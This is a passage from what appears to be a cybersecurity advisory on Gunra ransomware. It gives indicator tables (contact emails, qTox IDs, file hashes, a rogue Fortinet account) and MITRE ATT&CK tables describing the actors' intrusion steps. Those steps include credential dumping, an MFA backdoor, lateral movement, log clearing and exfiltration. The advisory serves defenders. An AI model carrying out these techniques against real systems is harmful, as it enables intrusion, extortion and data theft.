&lt;td&gt;Ransom negotiation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4569f6322bc3b22e9@proton[.]me&lt;/td&gt;
&lt;td&gt;Ransom negotiation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ilovemycubscout@gmail[.]com&lt;/td&gt;
&lt;td&gt;Ransom negotiation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6449a3c1e612168526@proton[.]me&lt;/td&gt;
&lt;td&gt;Ransom negotiation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The following qTox IDs are associated with Gunra actors:&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;2507312EC10BB44ED9DAA04E3C5C27E8C13154649B1A02E73ACFAE1681EE0208D05133A8FB22&lt;/li&gt;
&lt;li&gt;0FE87CED0C611AE97E049C64288557F49E8271E91399E849328B078DA789A573031783235BEF&lt;/li&gt;
&lt;li&gt;47829AF1C943D4C296C910706923AS199BDA4995B076ED9A9016F7DEF161D445DF00F13E6900&lt;/li&gt;
&lt;li&gt;9500B1A73716BCF40745086F7184A33EA0141B7D3F852431C8FDD2E1E8FAF9277E9FDC117B47&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href=&quot;#Table4&quot;&gt;&lt;strong&gt;Table 4&lt;/strong&gt;&lt;/a&gt; lists malicious files associated with Gunra ransomware.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table4&quot;&gt;&lt;/a&gt;Table 4. Malicious Files (SHA256)&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Filename&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Hash (SHA256)&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;main.exe&lt;/td&gt;
&lt;td&gt;2dc70a12d158d437e45a55b1d52f3d61c6082a1e1667573302ba3b62813e2751&lt;/td&gt;
&lt;td&gt;Tool to exfil OneDrive and SharePoint&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;main.exe&lt;/td&gt;
&lt;td&gt;834efe9b392c6c000877ea5613a079445affc16fe8af5997d68c55cafc95e5d1&lt;/td&gt;
&lt;td&gt;Tool to exfil OneDrive and SharePoint&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;cryptor.exe&lt;/td&gt;
&lt;td&gt;91f8fc7a3290611e28a35a403fd815554d9d856006cc2ee91ccdb64057ae53b0&lt;/td&gt;
&lt;td&gt;Malicious executable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;msmp.exe&lt;/td&gt;
&lt;td&gt;a82e496b7b5279cb6b93393ec167dd3f50aff1557366784b25f9e51cb23689d9&lt;/td&gt;
&lt;td&gt;Malicious executable&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;a href=&quot;#Table5&quot;&gt;&lt;strong&gt;Table 5&lt;/strong&gt;&lt;/a&gt; lists malicious accounts created by Gunra actors to gain initial access to victim Fortinet devices.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table5&quot;&gt;&lt;/a&gt;Table 5. Malicious Fortinet User Accounts&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Username&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Details&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;forticloud-sync&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2024-55591&quot; target=&quot;_blank&quot; title=&quot;CVE-2024-55591&quot;&gt;CVE-2024-55591&lt;/a&gt; and &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-24472&quot; target=&quot;_blank&quot; title=&quot;CVE-2025-24472&quot;&gt;CVE-2025-24472&lt;/a&gt; allow threat actors to exploit scheduled tasks on vulnerable FortiOS firewall devices to create a new, malicious persistent user forticloud-sync with super user privileges and a hard-coded password.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;MITRE&quot;&gt;&lt;strong&gt;MITRE ATT&amp;amp;CK Tactics and Techniques&lt;/strong&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;See &lt;a href=&quot;#Table6&quot;&gt;&lt;strong&gt;Table 6&lt;/strong&gt;&lt;/a&gt; to &lt;a href=&quot;#Table18&quot;&gt;&lt;strong&gt;Table 18&lt;/strong&gt;&lt;/a&gt; for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;amp;CK framework, see CISA and MITRE ATT&amp;amp;CK’s &lt;a href=&quot;https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping&quot; title=&quot;Best Practices for MITRE ATT&amp;amp;CK Mapping&quot;&gt;Best Practices for MITRE ATT&amp;amp;CK Mapping&lt;/a&gt; and CISA’s &lt;a href=&quot;https://github.com/cisagov/Decider/&quot; target=&quot;_blank&quot; title=&quot;Decider Tool&quot;&gt;Decider Tool&lt;/a&gt;.&lt;/p&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table6&quot;&gt;&lt;/a&gt;Table 6. Initial Access&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Exploit Public-Facing Application&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1190/&quot; target=&quot;_blank&quot; title=&quot;T1190&quot;&gt;T1190&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors exploited vulnerabilities in FortiGate firewall and SSL-VPN appliances to gain initial access to victim networks.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 7. Execution&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Windows Management Instrumentation&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1047&quot; target=&quot;_blank&quot; title=&quot;T1047&quot;&gt;T1047&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The Gunra ransomware binary contained specific WMI commands to delete volume shadow copies on victim machines.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Native API&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1106&quot; target=&quot;_blank&quot; title=&quot;T1106&quot;&gt;T1106&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The Gunra ransomware binary utilized Native APIs (&lt;code&gt;FindFirstFileW&lt;/code&gt;, &lt;code&gt;FindNextFileW&lt;/code&gt;) for file system discovery.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Scripting Interpreter: Windows Command Shell&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1059/003/&quot; target=&quot;_blank&quot; title=&quot;T1059.003&quot;&gt;T1059.003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors executed commands via &lt;code&gt;cmd.exe&lt;/code&gt; on Windows to initiate the WMI command.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 8. Persistence&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Account Manipulation&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1098/&quot; target=&quot;_blank&quot; title=&quot;T1098&quot;&gt;T1098&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors gained access to an unused account for a victim network. They altered the account configuration to bypass the mandatory password change requirement, which allowed them to use the compromised account for subsequent malicious activities.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;External Remote Services&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1133/&quot; target=&quot;_blank&quot; title=&quot;T1133&quot;&gt;T1133&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors used external-facing remote services in combination with an administrator account to gain access.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 9. Privilege Escalation&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Valid Accounts: Default Accounts&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1078/001/&quot; target=&quot;_blank&quot; title=&quot;T1078.001&quot;&gt;T1078.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors compromised an SSL-VPN appliance by exploiting default credentials and the absence of account lockout controls to obtain administrator access to the victim network device.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Valid Accounts: Domain Accounts&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1078/002/&quot; target=&quot;_blank&quot; title=&quot;T1078.002&quot;&gt;T1078.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors gained access to an administrator account for an SSL appliance.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 10. Stealth&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Debugger Evasion&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1622&quot; target=&quot;_blank&quot; title=&quot;T1622&quot;&gt;T1622&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The Gunra ransomware Windows encryptor binary contained the &lt;code&gt;IsDebuggerPresent&lt;/code&gt; API to defend against reverse engineering and debugging activity.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Indicator Removal: Clear Command History&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1070/003&quot; target=&quot;_blank&quot; title=&quot;T1070.003&quot;&gt;T1070.003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors cleared command history files on victim machines to prevent detection of their malicious activity.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Delay Execution&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1678/&quot; target=&quot;_blank&quot; title=&quot;T1678&quot;&gt;T1678&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors strategically timed their reconnaissance and malicious network activities to late night or early morning to avoid detection by the victim.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Selective Exclusion&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1679/&quot; target=&quot;_blank&quot; title=&quot;T1679&quot;&gt;T1679&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The Gunra ransomware binary programmatically excludes certain directories and filetypes from encryption to ensure system critical files continue to function and that ransom notes are readable. In addition, the binary contains logic to prevent re-encryption of already Gunra-encrypted files.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 11. Defense Impairment&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Disable or Modify Tools&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1685/&quot; target=&quot;_blank&quot; title=&quot;T1685&quot;&gt;T1685&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors cleared system/network logs on victim machines to prevent detection of their malicious activity.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 12. Credential Access&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;OS Credential Dumping: NTDS&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1003/003&quot; target=&quot;_blank&quot; title=&quot;T1003.003&quot;&gt;T1003.003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors used &lt;code&gt;secretsdump.py&lt;/code&gt; on multiple victim domain controllers to extract password hashes for user accounts from the NTDS files.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network Sniffing&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1040/&quot; target=&quot;_blank&quot; title=&quot;T1040&quot;&gt;T1040&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors abused SSL-VPN network traffic controls to capture users’ VDI login credentials and session information in transit, effectively sniffing authentication traffic for a victim network.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Steal Web Session Cookie&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1539/&quot; target=&quot;_blank&quot; title=&quot;T1539&quot;&gt;T1539&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors captured legitimate VDI session data for a victim, which allowed them to steal and reuse session cookies to hijack active sessions and impersonate legitimate users on the internal victim network.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credentials from Password Stores&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1555/&quot; target=&quot;_blank&quot; title=&quot;T1555&quot;&gt;T1555&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;From a compromised virtual desktop, Gunra actors accessed the Hiware access control server for a victim and stole its symmetric encryption key.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OS Credential Dumping&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1003/&quot; target=&quot;_blank&quot; title=&quot;T1003&quot;&gt;T1003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors used a stolen symmetric encryption key from a Hiware system access control server to decrypt and dump stored enterprise server passwords.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Modify Authentication Process: Multi-Factor Authentication&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1556/006/&quot; target=&quot;_blank&quot; title=&quot;T1556.006&quot;&gt;T1556.006&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors altered files in a victim’s VDI authentication server portal so that a specific attacker-chosen OTP always succeeded, creating a persistent backdoor that bypassed MFA.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 13. Discovery&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;File and Directory Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1083&quot; target=&quot;_blank&quot; title=&quot;T1083&quot;&gt;T1083&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;The Gunra ransomware binary contains custom instructions to enumerate the complete directory structure of victim machines to identify user-data files and directories for encryption.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;System Network Connections Discovery&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1049&quot; target=&quot;_blank&quot; title=&quot;T1049&quot;&gt;T1049&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors enumerated active system network connections to map reachable internal infrastructure prior to ransomware deployment.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 14. Lateral Movement&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Remote Services: Remote Desktop Protocol&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1021/001/&quot; target=&quot;_blank&quot; title=&quot;T1021.001&quot;&gt;T1021.001&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors used stolen VDI session information to access a victim’s internal VDI environment, then moved laterally via RDP to access the victim’s VDI authentication web server, internal AD server, and IT staff virtual desktops.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote Services: SMB/Windows Admin Shares&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1021/002/&quot; target=&quot;_blank&quot; title=&quot;T1021.002&quot;&gt;T1021.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors used SMB administrative shares with valid credentials to move laterally and deploy tools across compromised systems.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Use Alternate Authentication Material: Pass the Hash&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1550/002/&quot; target=&quot;_blank&quot; title=&quot;T1550.002&quot;&gt;T1550.002&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors used pass-the-hash methods to move laterally to privileged systems.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Use Alternate Authentication Material: Pass the Ticket&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1550/003/&quot; target=&quot;_blank&quot; title=&quot;T1550.003&quot;&gt;T1550.003&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors used pass-the-ticket methods to move laterally to privileged systems.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 15. Collection&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Collection&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/tactics/TA0009/&quot; target=&quot;_blank&quot; title=&quot;TA0009&quot;&gt;TA0009&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors were observed collecting business-critical documents, databases, PII, and internal email communications.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Archive Collected Data&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1560&quot; target=&quot;_blank&quot; title=&quot;T1560&quot;&gt;T1560&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors were observed utilizing tools such as 7-Zip, WinRAR, RClone, and others to copy and archive victim data for exfiltration.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data from Cloud Storage&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1530&quot; target=&quot;_blank&quot; title=&quot;T1530&quot;&gt;T1530&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors launched a malicious application (&lt;code&gt;main.exe&lt;/code&gt;) that specifically targeted Microsoft Cloud Services (OneDrive and SharePoint) for data exfiltration.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data from Local System&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1005&quot; target=&quot;_blank&quot; title=&quot;T1005&quot;&gt;T1005&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;The Gunra ransomware binary recursed through the full directory structure of a compromised device to identify user-data files and directories for targeted exfiltration and subsequent encryption.&lt;/p&gt;
&lt;p&gt;In one instance, Gunra actors were observed collecting system and network configuration network information by connecting to the VDI environments of IT personnel.&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Email Collection&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1114/&quot; target=&quot;_blank&quot; title=&quot;T1114&quot;&gt;T1114&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors collected internal email communications.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 16. Command and Control&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Ingress Tool Transfer&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1105/&quot; target=&quot;_blank&quot; title=&quot;T1105&quot;&gt;T1105&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;After obtaining admin access to a victim’s SSL-VPN appliance, Gunra actors downloaded an SSH tunneling tool from an external server to create and maintain persistent tunnel connections to compromised systems in the victim’s network.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protocol Tunneling&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1572/&quot; target=&quot;_blank&quot; title=&quot;T1572&quot;&gt;T1572&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors used an SSH tunneling tool to establish connections and maintain persistence between compromised systems.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;Table 17. Exfiltration&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Exfiltration Over Web Service&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1567&quot; target=&quot;_blank&quot; title=&quot;T1567&quot;&gt;T1567&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors were observed archiving victim data and exfiltrating it over the file-sharing service Mega.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exfiltration Over Alternative Protocol&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1048&quot; target=&quot;_blank&quot; title=&quot;T1048&quot;&gt;T1048&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Gunra actors used Filezilla software to exfiltrate data over FTP.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;Table18&quot;&gt;&lt;/a&gt;Table 18. Impact&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;Technique Title&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;ID&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
